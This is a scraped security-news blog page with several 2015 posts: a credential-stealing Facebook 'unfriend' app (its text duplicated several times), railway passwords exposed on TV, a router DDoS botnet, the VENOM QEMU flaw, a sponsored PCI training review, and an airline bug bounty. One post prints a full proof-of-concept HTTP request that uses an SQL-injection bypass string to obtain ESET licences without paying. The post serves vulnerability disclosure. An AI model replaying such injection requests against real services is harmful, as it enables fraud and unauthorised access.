Today everybody wants to know — Who visited my Facebook profile?, Who unfriended me from the Facebook Friend list?, Who saw my Facebook posts?, and many other features that isn't provided by Facebook by default.

So most Facebook users try to find out a software and fall victim to one that promises to accomplish their desired task. Hackers make use of this weakness and often design malicious programs in order to victimize broad audience.

Following I am going to disclose the realities behind one such software designed cleverly to trick Facebook users to make them believe it is genuine.


UnfriendAlert, a free application that notifies you whenever someone removes you from the Facebook friend list, has been found collecting its users' Facebook credentials.

UnfriendAlert Stealing your Facebook Credentials:

Security researchers at Malwarebytes have warned users of the UnfriendAlert app saying that the notorious app asks users to login with their Facebook credentials to activate unfriends monitoring and alert service for your Facebook profile.

Facebook has provided API OAuth login system for third party applications, where users don't need to provide their Facebook credentials to them. So you should never submit your Facebook password to any third party service or desktop software in any case.

Once you enter your login credentials, Unfriend Alert will send it to the website "yougotunfriended.com" owned by attackers.

Late last month, UnfriendAlert was also classified as potentially unwanted program (PUP) which often displays unwanted advertisements and deceptively installs other malicious software and free apps when visiting some web pages in your Chrome, Firefox, and Internet Explorer, making you fail to block them.

Uninstall UnfriendAlert and Change your Password Now!

So users are recommended to uninstall UnfriendAlert App from your computer, and besides removing this, you are also advised to change your Facebook password as soon as possible. You can do this under "Settings —> Password —> Edit."

Always do some research before installing any third party application as your one single mistake could compromise your online security and privacy in various ways.

UnfriendAlert, a free application that notifies you whenever someone removes you from the Facebook friend list, has been found collecting its users' Facebook credentials.

UnfriendAlert Stealing your Facebook Credentials:

Security researchers at Malwarebytes have warned users of the UnfriendAlert app saying that the notorious app asks users to login with their Facebook credentials to activate unfriends monitoring and alert service for your Facebook profile.
Facebook has provided API OAuth login system for third party applications, where users don't need to provide their Facebook credentials to them. So you should never submit your Facebook password to any third party service or desktop software in any case.
Once you enter your login credentials, UnfriendAlert will send it to the website "yougotunfriended.com" owned by attackers.
Late last month, UnfriendAlert was also classified as potentially unwanted program (PUP) which often displays unwanted advertisements and deceptively installs other malicious software and free apps when visiting some web pages in your Chrome, Firefox, and Internet Explorer, making you fail to block them.

Uninstall UnfriendAlert and Change your Password Now!

So users are recommended to uninstall UnfriendAlert App from your computer, and besides removing this, you are also advised to change your Facebook password as soon as possible. You can do this under "Settings —> Password —> Edit."
Always do some research before installing any third party application as your one single mistake could compromise your online security and privacy in various ways.
- See more at: http://thehackernews.com/2015/06/facebook-password-hacking.html#sthash.HBPYrFMH.dpuf


Today everybody wants to know — Who visited my Facebook profile?, Who unfriended me from the Facebook Friend list?, Who saw my Facebook posts?, and many other features that isn't provided by Facebook by default.
So most Facebook users try to find out a software and fall victim to one that promises to accomplish their desired task. Hackers make use of this weakness and often design malicious programs in order to victimize broad audience.
Following I am going to disclose the realities behind one such software designed cleverly to trick Facebook users to make them believe it is genuine.
- See more at: http://thehackernews.com/2015/06/facebook-password-hacking.html#sthash.HBPYrFMH.dpuf
Today everybody wants to know — Who visited my Facebook profile?, Who unfriended me from the Facebook Friend list?, Who saw my Facebook posts?, and many other features that isn't provided by Facebook by default.
So most Facebook users try to find out a software and fall victim to one that promises to accomplish their desired task. Hackers make use of this weakness and often design malicious programs in order to victimize broad audience.
Following I am going to disclose the realities behind one such software designed cleverly to trick Facebook users to make them believe it is genuine.
- See more at: http://thehackernews.com/2015/06/facebook-password-hacking.html#sthash.HBPYrFMH.dpuf



The Weakest Link In the Information Security Chain is still – Humans.

And this news has ability to prove this fact Right.

One of London's busiest railway stations has unwittingly exposed their system credentials during a BBC documentary. The sensitive credentials printed and attached to the top of a station controller's monitor were aired on Wednesday night on BBC.

What could be even worse?


If you think that the credentials might have been shown off in the documentary for a while or some seconds, then you are still unaware of the limit of their stupidity.

The login credentials were visible for about 44 minute in the BBC documentary "Nick and Margaret: The Trouble with Our Trains" on Wednesday night, which featured Nick Hewer and Margaret Mountford – the two business experts, both famous for their supporting role on The Apprentice.

The documentary was available on the YouTube, but have now been removed due to security concerns.

While talking about the concerns of the British railway network, the duo walked into London Waterloo's control room where these sensitive credentials were seen stuck to a monitor of a system.

A screenshot of the offending monitor with the machine-produced login was captured and shown above. The screenshot points to a particular workstation signaller's control desk seems to be running a type of software that controls signals and trains over‪ the final approach to Waterloo station‬.

Now this is going to be a great idea to keep passwords. Isn’t this? I mean if it is, then what’s the need of putting passwords for the devices if you stuck it on the top of that device.

This shows that we are just humans. Remembering so many personal passwords of our different online accounts and then to remember the passwords of others – Ahh! Quite a tough Job.

Okay, now let’s come to another security concern. What would you expect next?

Password3, Wow! Isn’t this great password?


I mean, at least keep a strong password that take some time to guess and crack. Password3 could be in the list of top ten weakest passwords.

The incident occur few days after the news came that the computer systems controlling the railway signalling system in the United Kingdom could potentially be hacked by cyber criminals to cause oncoming trains to crash into one another at highest speeds.

However, this security blunder of revealing passwords mistakenly in an interview, video or news channel is not new at all.

Last year, the World Cup security centre’s internal Wi-Fi passwords for the FIFA World Cup 2014 were broadcast live. Also, French TV network TV5Monde failed to keep its passwords secret and revealed a collection of the TV station’s usernames and passwords live on TV.


Vulnerability in ESET NOD32 Licence Activation system generates unlimited usernames and passwords for free

Vulnerability in ESET NOD32 Licence Activation generates unlimited usernames and passwords for free


Security Researcher discovers Vulnerability in ESET Nod32 Antivirus License authentication system which generates free license (username and password)

With so many worms and trojans out in the open, every computer user would like to have an Antivirus on board his/her PC but it would be really nice to have a paid version of an Antivirus for free. No this is not a giveaway but a researcher has discovered a serious vulnerability in the ESET Nod32 licensed version which allows hackers to use it for a full year without paying.
Security researcher, Mohamed Abdelbaset Elnoby has discovered a vulnerability in ESET Nod32 licensed version authentication  that allows potential hackers generate millions of usernames and passwords without a hitch.
Elnoby has dubbed the authentication bug as “hilarious” and he states that, “Hilarious Broken Authentication bug I found in ESET website specifically in their “Antivirus Product Activation Process” that allowed me to generate millions of valid paid Licenses of  “ESET Nod32 Antivirus” as per their description “Our award-winning security software offers the most effective protection available today” for free. ”
The exploit of generating unlimited usernames and passwords for ESET Nod32 is caused due to broken authentication bug. While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessed only after authentication has been performed. Elnoby discovered that there are several ways of bypassing the ESET Nod32 authentication like :
  • Direct page request (forced browsing)
  • Parameter modification
  • Session ID prediction
  • SQL injection
The PoC of the bug is given below :
[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:
POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--
Each time a potential hacker used the above authentication bypass string he/she could generate a free paid license of ESET Nod32 valid for 1 Year which costs $29.00 per user/request. ESET has acknowledged the vulnerability and has now patched the website. It also awarded Elnoby a bug bounty of 1 years free licence for his efforts. The bug may not be that hilarious but the bug bounty awarded to him sure seems  “hilarious” because Elnoby must have saved quite a fortune for ESET.
The video of the PoC is given below :



Small office and home office (SOHO) routers are an increasingly common target for cybercriminals, not because of any vulnerability, but because most routers are loosely managed and often deployed with default administrator credentials.

A new report suggests that hackers are using large botnet of tens of thousands of insecure home and office-based routers to launch Distributed Denial-of-Service (DDoS) attacks.

Security researchers from DDoS protection firm Incapsula uncovered a router-based botnet, still largely active while investigating a series of DDoS attacks against its customers that have been underway since at least last December, 2014.

Over the past four months, researchers have recorded malicious traffic targeting 60 of its clients came from some 40,269 IP addresses belonging to 1,600 ISPs around the world.

Almost all of the infected routers that were part of the botnet appear to be ARM-based models from a California-based networking company Ubiquiti Networks, sold across the world.

This makes researchers believed that the cyber criminals were exploiting a firmware vulnerability in the routers.

What’s revealed in the close inspection?


However, this assumption was proved wrong when inspected deeply, revealing that…
  • All of the compromised routers could be remotely accessible on the default ports (via HTTP and SSH)
  • Almost all of those accounts continued to make use of vendor-provided login credentials

This basically opens the door for an attacker to man-in-the-middle (MitM) attacks, eavesdrop on all communication, cookie hijack, and allows hackers to gain access to other local network devices such as CCTV cameras.

Router makers design their devices in such a way that it can be easily connected, and therefore they give each user the same administrator credential, without giving any warning to change the default credentials. Moreover, instead of allowing users to turn on remote administration, the manufacturers make it on by default.
"Given how easy it is to hijack these devices, we expect to see them being exploited by additional perpetrators," researchers wrote. "Even as we conducted our research, the Incapsula security team documented numerous new malware types being added—each compounding the threat posed by the existence of these botnet devices."

A variety of DDoS malware involvement:


The security firm also discovered a variety of DDoS malware programs, including MrBlack, Dofloo, and Mayday, installed on the insecure devices in order to attempt other malicious tasks such as:

  • Redirect victims to malicious websites
  • Intercept victims’ online banking sessions
  • Inject rogue and malicious advertisements into the victim's Web traffic
  • Steal login credentials for various online accounts
  • Perform other illegal activities


The question remains — Who is behind this botnet?


Researchers found some indirect evidence correlating the router-based botnet to a notorious hackers group called Lizard Squad, a group that has used compromised routers to launch DDoS attacks against Sony's PlayStation and Microsoft's Xbox networks.

Back in January, Lizard Squad set up a DDoS-for-hire service called Lizard Stresser that was using hacked home routers. However, Incapsula believes that it’s not Lizard Stresser because it is powered by different malware programs.

The botnet comprises devices in 109 countries, with Thailand (64 percent), Brazil, and the United States being the top three most-affected nations. Also, the firm identified 60 command and control servers used by criminals to control the botnet, the majority of them were located in China and the U.S.

The bottom line:


Users should also keep in mind the safety of their devices by making sure that they:

  • Disable all remote access to the devices unless it's specifically needed
  • Change the default login credentials for their routers to prevent unauthorized access
  • Router firmware is up-to-date


Compromised routers are not at all new. Some manufacturers, including Linksys, Asus, D-Link, Micronet, Tenda, and TP-Link, have been known to be vulnerable. Incapsula has informed specific routers manufacturers and the relevant ISPs about the insecurity of the routers they market.



Just after a new security vulnerability surfaced Wednesday, many tech outlets started comparing it with HeartBleed, the serious security glitch uncovered last year that rendered communications with many well-known web services insecure, potentially exposing Millions of plain-text passwords.

But don’t panic. Though the recent vulnerability has a more terrific name than HeartBleed, it is not going to cause as much danger as HeartBleed did.

Dubbed VENOM, stands for Virtualized Environment Neglected Operations Manipulation, is a virtual machine security flaw uncovered by security firm CrowdStrike that could expose most of the data centers to malware attacks, but in theory.

Yes, the risk of Venom vulnerability is theoretical as there is no real-time exploitation seen yet, while, on the other hand, last year’s HeartBleed bug was practically exploited by hackers unknown number of times, leading to the theft of critical personal information.

Now let’s know more about Venom:


Venom (CVE-2015-3456) resides in the virtual floppy drive code used by a several number of computer virtualization platforms that if exploited…

...could allow an attacker to escape from a guest 'virtual machine' (VM) and gain full control of the operating system hosting them, as well as any other guest VMs running on the same host machine.

According to CrowdStrike, this roughly decade-old bug was discovered in the open-source virtualization package QEMU, affecting its Virtual Floppy Disk Controller (FDC) that is being used in many modern virtualization platforms and appliances, including Xen, KVM, Oracle's VirtualBox, and the native QEMU client.

Jason Geffner, a senior security researcher at CrowdStrike who discovered the flaw, warned that the vulnerability affects all the versions of QEMU dated back to 2004, when the virtual floppy controller was introduced at the very first.

However, Geffner also added that so far, there is no known exploit that could successfully exploit the vulnerability. Venom is critical and disturbing enough to be considered a high-priority bug.

Successful exploitation of Venom required:

For successful exploitation, an attacker sitting on the guest virtual machine would need sufficient permissions to get access to the floppy disk controller I/O ports.

When considering on Linux guest machine, an attacker would need to have either root access or elevated privilege. However on Windows guest, practically anyone would have sufficient permissions to access the FDC.

However, comparing Venom with Heartbleed is something of no comparison. Where HeartBleed allowed hackers to probe Millions of systems, Venom bug simply would not be exploitable at the same scale.

Flaws like Venom are typically used in a highly targeted attack such as corporate espionage, cyber warfare or other targeted attacks of these kinds.

Did venom poison Clouds Services?


Potentially more concerning are most of the large cloud providers, including Amazon, Oracle, Citrix, and Rackspace, which rely heavily on QEMU-based virtualization are vulnerable to Venom.

However, the good news is that most of them have resolved the issue, assuring that their customers needn't worry.
"There is no risk to AWS customer data or instances," Amazon Web Services said in a statement.
Rackspace also said the flaw does affect a portion of its Cloud Servers, but assured its customers that it has "applied the appropriate patch to our infrastructure and are working with customers to remediate fully this vulnerability."

Azure cloud service by Microsoft, on the other hand, uses its homemade virtualization hypervisor technology, and, therefore, its customers are not affected by Venom bug.

Meanwhile, Google also assured that its Cloud Service Platform does not use the vulnerable software, thus was never vulnerable to Venom.

Patch Now! Prevent yourself


Both Xen and QEMU have rolled out patches for Venom. If you're running an earlier version of Xen or QEMU, upgrade and apply the patch.

Note: All versions of Red Hat Enterprise Linux, which includes QEMU, are vulnerable to Venom. Red Hat recommend its users to update their system using the commands, "yum update" or "yum update qemu-kvm."

Once done, you must "power off" all your guests Virtual Machines for the update to take place, and then restart it to be on the safer side. But remember, only restarting without power off the guest operating system is not enough for the administrators because it would still use the old QEMU binary.




Target’s data breach is a chilling example: After the widely publicized hack, 12% of loyal shoppers no longer shop at that retailer, and 36% shop at the retailer less frequently. For those who continue to shop, 79% are more likely to use cash instead of credit cards. 

According to DeMeo, Vice President of Global Marketing and Analytics at Interactions Marketing Group, shoppers who use cash statistically spend less money, hurting the company. Indeed, 26% say they will knowingly spend less than before.

So, why did Target get hacked?

There could be two reasons, either they (or one of their vendors) lacked in their IT Security implementation or their employees were not stepped through effective security awareness training. In Target's case, an employee at one of their vendors was tricked into clicking on a phishing link.

Now, let's have a look at what Target affirmed:
"Target was certified as meeting the standard for the payment card industry in September 2013. Nonetheless, we suffered a data breach."
The above statement was given by Target's President, Chairman and Chief Executive Officer (CEO), Gregg Steinhafel. The standard he is talking about here is known as PCI compliance, mandated by the Payment Card Industry.

PCI data security standard (PCI DSS) is a standard implemented to create a secure environment for electronic payments. So, any organization that is involved in payment card transactions must ensure that they are compliant with PCI DSS.

However, simply being compliant does not guarantee your network is secure. Being compliant is a baseline that you are going to build your network security on top of.

Compare it to this: You have passed your PCI audit and you are secure is like, you have a driver's license and you are a safe driver.

In both the situations, your security is not confirmed if you do not educate yourself properly.

That's right – Despite having all the technical controls in place that safeguard your customers’ payment card information, the PCI standard also requires you to educate your employees about the PCI Data Security Standards.

Education is an essential step, no matter what people in the industry may say about Cyber Security Awareness Training. You should roll out an effective training program to help protect your organization against the threats you face every day.

A few weeks back, we introduced KnowBe4's Kevin Mitnick Security Awareness Training Program which aims at making employees understand the mechanisms of phishing, spear phishing, spam, malware and social engineering, and then able to apply this knowledge in their day-to-day job.

This time, we look at the module called: PCI Compliance Simplified

I worked my way through the PCI DSS Training module offered by KnowBe4. It's a web-based interactive training using real examples of credit card fraud, and how to protect your network against such attacks.

KnowBe4 developed a clear and simple training module known as PCI Compliance Simplified 2015, which is specially designed to offer companies and merchants the in-depth knowledge necessary to make decisions regarding their PCI compliance efforts.

Being compliant with PCI DSS, you have the basics in place to keep your customers' valuable payment data safe and secure and out of the hands of fraudsters. It is also required to keep your merchant account and be able to accept credit cards.

Company employees that handle PCI compliance, and who have completed this excellent on-demand, web-based course will leave with:
  • a strong understanding of the intent behind each PCI requirement
  • teach secure habits and best practices that will promote a secure environment
  • how to apply them to their business environment
  • how to stay PCI compliant with the new PCI DSS 3.0 standard
  • knowledge how to avoid a data breach
"This course is for anyone that’s responsible for handling credit cards in your organization and qualifies as Security Awareness Training. Especially owners, the CFO or Controller, managers and IT people in charge of credit card processing should take this course," course web page says.
The idea behind KnowBe4's PCI Compliance Simplified training module is that your business is protected at its best when every employee that may touch cardholder's data understands the importance of managing that data securely.

Along with the PCI Compliance Simplified training, KnowBe4 also offers a training module for any employee that is handling credit cards and needs to learn how to safely handle cards.

It's called Basics Of Credit Card Security and is meant for all employees who are taking orders on the phone, swipe cards on terminals or through devices connected to smartphones. It teaches employees to handle credit card information securely to prevent data breaches.

Different types of cards are covered, which specific elements the hackers are after, and explains how malware like keyloggers, password crackers, and spyware can endanger credit card information. 

Employees are taught the rules for paper copies of credit card data, and things to remember during data entry, including things NOT to do like sending credit card information through email and text and more. A quiz ends off this 20-minute course.

These courses are an incredible time saver for busy managers. So if you want your business to be better protected and your customers' data to be secured, find out how affordable this is. Go to KnowBe4 and ask them for a quote. You will be pleasantly surprised.






If you are a security researcher and fond of traveling from one conference to another, then United Airlines' bug bounty program would be of great interest for you.

United Airlines has launched a new bug bounty program inviting security researchers and bug hunters to report vulnerabilities in its websites, apps and web portals.

Bug bounty programs are very common among technology firms, including Google and Facebook, who offer you hundreds of thousands of dollars as rewards for exposing security flaws and errors in their products.

So, what’s different in United Airlines new bug bounty?


The most interesting part of this bug bounty program is – Instead of offering cold, hard cash, United Airlines is offering air miles as the reward for yours.

Let’s see what United Airlines says about its bug bounty program:


"At United, we take your safety, security and privacy seriously. We utilize best practices and are confident that our systems are secure," said the company.
"We believe that this program will further bolster our security and allow us to continue to provide excellent service. If you think you have discovered a potential bug that affects our websites, apps, and online portals, please let us know. If the submission meets our requirements, we'll gladly reward you for your time and effort."

The classification of the bug bounty rewards:


The rewards range from 50,000 air miles to 1 Million air miles. The worse the vulnerability you discover, the more miles you win.
  • Low-severity bugs including cross-site scripting, cross-site request forgery and third-party issues affecting United are worth 50,000 air miles.
  • Medium-severity flaw includes authentication bypass, denial-of-service attacks, brute-force attacks and security issues that could lead to the disclosure of personally identifiable information are worth 250,000 air miles per vulnerability.
  • The top prize, a Million-mile payout, will be rewarded to researchers who will find high-severity vulnerabilities related to issues that would lead remote code execution on United's online properties.


However, there are some important rules by United Airlines that are worth keeping in mind too.

One important rule to note is that the bug bounty program specifically doesn’t cover vulnerabilities in its "onboard Wi-Fi, entertainment systems or avionics" systems, thus don’t do ahead digging out bugs while you are in-flight.

It doesn’t mean that United Airlines do not consider such vulnerabilities as serious, but it really don’t want to encourage researchers attempting to find bugs in a plane that is flying at 30,000 feet.

Don’t mess with in-flight systems


One such example United recently introduced as part of the small print, when they removed security researcher Chris Roberts from a flight for a joke tweet made by him about possible in-flight vulnerabilities.

Accidentally crashing flight’s ticketing server means lost revenue or accidentally crashing a flight’s avionics potentially means lost of lives. So according to the fine print, these types of attempts would considered possibly under criminal investigation.

Moreover, vulnerabilities only exist on unsupported operating systems or browsers are not considered to be eligible for the bounty program.

Although, it’s good to see that United Airlines is welcoming vulnerability reports from researchers and rewarding them for their work that shows their keenness to protect their customers’ privacy and prevent hackers from exposing their databases or other sensitive details.


Follow:

Created by ThemeXpose